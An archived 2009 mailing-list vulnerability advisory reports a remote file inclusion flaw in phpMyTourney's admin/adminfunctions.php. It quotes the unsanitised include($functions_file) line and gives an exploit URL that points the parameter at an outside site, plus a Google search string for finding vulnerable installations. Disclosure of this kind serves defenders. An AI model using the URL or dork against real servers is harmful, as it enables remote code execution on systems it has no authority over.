Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SECURITY] [DSA 1818-1] New gforge packages fix insufficient input sanitising

From:	IrIsT.Ir_(at)_gmail.com <IrIsT.Ir_(at)_gmail.com>
Date:	18.06.2009
Subject:	phpMyTourney adminfunctions.php Remote File Include Vulnerabilities

Hi
a bug in phpMyTourney that allows to us to occur a Remote File Include on a Remote machin.

Bug :


#################################################################################
####
#                                                                                  
 #
#                Islamic Republic Of Iran Security Team                             #
#                                                                                  
 #
#                            Www.IrIsT.Ir                                           #
#                                                                                  
 #
#################################################################################
####
#                                                                                  
 #
# phpMyTourney adminfunctions.php Remote File Include Vulnerabilities               #
#                                                                                  
 #
# Download......: http:/phpmytourney.sourceforge.net                                #
#                                                                                  
 #
# file;                                                                             #
# dminfunctions.php                                                                 #
#                                                                                  
 #
# bug;                                                                              #
#                                                                                  
 #
# include($functions_file);                                                         #
#                                                                                  
 #
# Exploit...: http://[site]/[path]/admin/adminfunctions.php?functions_file=[Site]?  #
#                                                                                  
 #
#################################################################################
####
# Bug Found.....: IrIsT™                                                            #
#                                                                                  
 #
# discovery.....: Am!r (IrIsT™)                                                     #
#                                                                                  
 #
# contact.......: IrIsT.Ir[at]Gmail.Com                                             #
#                                                                                  
 #
# Google Search.: "Powered By phpMyTourney"                                         #
#                                                                                  
 #
#################################################################################
####